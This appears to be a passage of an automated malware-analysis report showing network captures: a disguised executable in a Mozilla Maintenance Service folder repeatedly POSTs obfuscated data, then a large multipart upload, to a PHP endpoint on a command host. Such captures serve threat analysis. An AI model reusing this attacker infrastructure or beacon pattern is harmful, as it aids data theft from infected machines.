                                                                    Data Ascii: QYQ[[WPT^WZQWYP_TRTSVTWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9;!93&5:_;"019'!T"&4#1,%-)%Z"!Q*9
                                                                    Mar 5, 2024 22:27:55.979285002 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    14192.168.2.54973391.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:56.373497009 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:56.583475113 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:56.583683014 CET2596OUTData Raw: 51 59 51 5d 5b 5a 55 55 5e 57 5a 51 57 58 50 5f 54 50 54 5b 56 58 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QYQ][ZUU^WZQWXP_TPT[VXWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9D/220#"$*8?.\$$1 T5<7!Z7^$1<&;9%Z"!Q*-
                                                                    Mar 5, 2024 22:27:56.820386887 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    15192.168.2.54973491.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:56.899564981 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:57.112266064 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:57.112534046 CET1920OUTData Raw: 51 5b 51 59 5e 5e 50 50 5e 57 5a 51 57 58 50 53 54 55 54 5f 56 59 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[QY^^PP^WZQWXPSTUT_VYWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:;9'3[3%!86'^3%3"45<(&$+X&!/%Z"!Q*-
                                                                    Mar 5, 2024 22:27:57.350136042 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.54973591.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:57.066625118 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:57.275466919 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:57.275692940 CET2592OUTData Raw: 54 59 54 51 5b 5d 50 56 5e 57 5a 51 57 59 50 5d 54 5c 54 5e 56 5c 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TYTQ[]PV^WZQWYP]T\T^V\WZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9B/W&T0"$&;$813",4P!,&$,$?&89%Z"!Q*1
                                                                    Mar 5, 2024 22:27:57.510828972 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.54973691.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:57.887227058 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:27:58.096865892 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:58.097165108 CET2596OUTData Raw: 51 59 51 5d 5e 5b 55 54 5e 57 5a 51 57 50 50 58 54 5d 54 59 56 5f 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QYQ]^[UT^WZQWPPXT]TYV_W_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9,!*V'1$5:X/*3#]2* T",",Y0;12;9%Z"!Q*
                                                                    Mar 5, 2024 22:27:58.334597111 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.54973791.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:58.694907904 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:58.911946058 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:58.914766073 CET2596OUTData Raw: 51 5b 54 50 5e 5d 55 54 5e 57 5a 51 57 5b 50 53 54 50 54 5a 56 5e 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[TP^]UT^WZQW[PSTPTZV^WTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/1:R'0"$&;.38&$P",T6/+Y0$?X&/%Z"!Q*!
                                                                    Mar 5, 2024 22:27:59.152261972 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:27:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.54973891.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:27:59.551295042 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:27:59.762260914 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:27:59.978187084 CET2596OUTData Raw: 51 5c 54 5e 5e 5d 55 53 5e 57 5a 51 57 51 50 5e 54 50 54 5a 56 58 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q\T^^]US^WZQWQP^TPTZVXW\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:,10#%09/6]081,#?'60$_1%;9%Z"!Q*
                                                                    Mar 5, 2024 22:28:00.215826035 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.54973991.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:02.083451986 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:02.301127911 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:02.301346064 CET2596OUTData Raw: 54 5b 54 50 5e 5e 50 57 5e 57 5a 51 57 50 50 5f 54 55 54 5a 56 5a 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T[TP^^PW^WZQWPP_TUTZVZWXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]982T$U%$%!,]$/%,P"Z$V!<$';]%;%Z"!Q*


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.54974091.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:02.597104073 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:02.808135986 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:02.808443069 CET1920OUTData Raw: 54 50 51 5a 5b 5b 55 52 5e 57 5a 51 57 5a 50 5b 54 5d 54 5e 56 54 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TPQZ[[UR^WZQWZP[T]T^VTWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9B/W:R'#1Z3&/Y2';8&9 V#,/6+\&'?Y1;%Z"!Q*%
                                                                    Mar 5, 2024 22:28:03.065568924 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.54974191.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:02.771296024 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:02.983547926 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:02.983853102 CET2596OUTData Raw: 54 5d 51 59 5b 5a 55 54 5e 57 5a 51 57 5e 50 5a 54 5d 54 5e 56 5c 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T]QY[ZUT^WZQW^PZT]T^V\W^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:,"2R3U!]'&6^,>0;#Y2*0U" P50&' 2!,%Z"!Q*
                                                                    Mar 5, 2024 22:28:03.222820997 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.54974291.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:03.573340893 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2584
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:03.792252064 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:03.795339108 CET2584OUTData Raw: 51 5a 54 5a 5b 57 55 5d 5e 57 5a 51 57 59 50 5b 54 52 54 58 56 5a 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QZTZ[WU]^WZQWYP[TRTXVZW_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/$U9]'%%/,1$Z1'! Q"?$^2];%Z"!Q*
                                                                    Mar 5, 2024 22:28:04.033206940 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    24192.168.2.54974391.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:04.389267921 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:04.601300001 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:04.601573944 CET2596OUTData Raw: 51 5b 54 5d 5b 56 55 5d 5e 57 5a 51 57 50 50 53 54 50 54 5f 56 5b 57 59 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[T][VU]^WZQWPPSTPT_V[WYT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C8"R'0!36*^,?"3(')<P"Z4W#< &4'_11,%Z"!Q*
                                                                    Mar 5, 2024 22:28:04.841502905 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    25192.168.2.54974491.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:05.234014034 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:05.445168018 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:05.445393085 CET2596OUTData Raw: 51 5b 54 50 5e 5b 55 51 5e 57 5a 51 57 5c 50 5e 54 54 54 5b 56 5b 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[TP^[UQ^WZQW\P^TTT[V[W\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C.2-'=_$P*\,10+[%*<6/(6?#^&$$&<Y/)%Z"!Q*=
                                                                    Mar 5, 2024 22:28:05.683638096 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    26192.168.2.54974591.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:05.279259920 CET394OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=----NXSs6uGjFUy79BBdK9dKPvwpKOgkEkW40K
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 141782
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:05.521979094 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:05.522361994 CET12860OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 58 53 73 36 75 47 6a 46 55 79 37 39 42 42 64 4b 39 64 4b 50 76 77 70 4b 4f 67 6b 45 6b 57 34 30 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                    Data Ascii: ------NXSs6uGjFUy79BBdK9dKPvwpKOgkEkW40KContent-Disposition: form-data; name="0"Content-Type: text/plainT_T^^ZPQ^WZQW\P[TWT^VTWZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]
